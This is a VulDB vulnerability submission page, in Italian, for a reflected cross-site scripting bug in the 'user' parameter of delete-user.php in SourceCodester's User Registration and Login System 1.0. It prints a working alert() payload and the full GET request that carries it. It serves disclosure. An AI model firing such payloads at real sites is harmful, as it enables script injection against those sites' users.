Invia #246052: https://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacksinformazioni

Titolohttps://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacks
DescrizioneUser Registration and Login System by rems has xss (Reflected XSS) BUG_Author: hlhyp vendors: https://www.sourcecodester.com/php/16890/user-registration-and-login-system-using-php-source-code.html Vulnerability File: /endpoint/delete-user.php [+] payload: /endpoint/delete-user.php?user=1'"()%26%25<ScRiPt%20>alert(%27this%20has%20xss%27)</ScRiPt> GET /endpoint/delete-user.php?user=1'"()%26%25<zzz><ScRiPt%20>alert(%27this%20has%20xss%27)</ScRiPt> HTTP/1.1 Referer: http://192.168.6.1/ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: 192.168.6.1 Connection: Keep-alive
Fonte⚠️ https://github.com/qqisee/vulndis/blob/main/xss_delete_user.md
Utente
 hlhyp (UID 59415)
Sottomissione01/12/2023 09:24 (3 anni fa)
Moderazione01/12/2023 17:05 (8 hours later)
StatoAccettato
Voce VulDB246612 [SourceCodester User Registration and Login System 1.0 delete-user.php Utente cross site scripting]
Punti20

PrecedenteVisione D'ensembleIl prossimo

Do you need the next level of professionalism?

Upgrade your account now!